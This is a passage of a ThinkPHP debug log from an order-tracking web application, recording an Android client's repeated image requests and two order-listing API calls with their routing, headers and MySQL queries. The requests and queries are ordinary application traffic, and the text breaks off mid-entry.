[ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001049s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:36+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020851s][吞吐率:47.96req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001307s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:36+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.027592s][吞吐率:36.24req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001045s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001582s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000090s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:36+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020895s][吞吐率:47.86req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001265s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:36+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021787s][吞吐率:45.90req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001256s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:36+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020684s][吞吐率:48.35req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001258s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:37+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018349s][吞吐率:54.50req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001046s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:37+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020356s][吞吐率:49.13req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001321s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:37+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.028168s][吞吐率:35.50req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000058s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001592s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:37+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018412s][吞吐率:54.31req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001064s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:37+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020318s][吞吐率:49.22req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001077s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:38+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020224s][吞吐率:49.45req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001192s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:44+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=0&pageNum=10 [运行时间:0.059132s][吞吐率:16.91req/s] [内存消耗:4,769.87kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000058s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001636s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.002281s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000718s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001421s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000329s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001423s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000971s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308364>orderinfo.end_time desc,1658308364>orderinfo.end_time desc,1658308364-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 0,10 [ RunTime:0.002822s ] --------------------------------------------------------------- [ 2022-07-20T17:12:45+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020509s][吞吐率:48.76req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001245s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:48+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=1&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=1&pageNum=10 [运行时间:0.053240s][吞吐率:18.78req/s] [内存消耗:4,769.86kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001121s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '1', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001595s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000494s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001458s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000365s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001973s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001298s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308368>orderinfo.end_time desc,1658308368>orderinfo.end_time desc,1658308368-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 10,10 [ RunTime:0.002565s ] --------------------------------------------------------------- [ 2022-07-20T17:12:49+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020699s][吞吐率:48.31req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001109s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:49+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021020s][吞吐率:47.57req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001145s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:50+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020648s][吞吐率:48.43req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001078s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:51+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020400s][吞吐率:49.02req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001054s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:52+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021109s][吞吐率:47.37req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000058s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001191s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:53+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020936s][吞吐率:47.76req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001266s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:53+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019460s][吞吐率:51.39req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001217s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 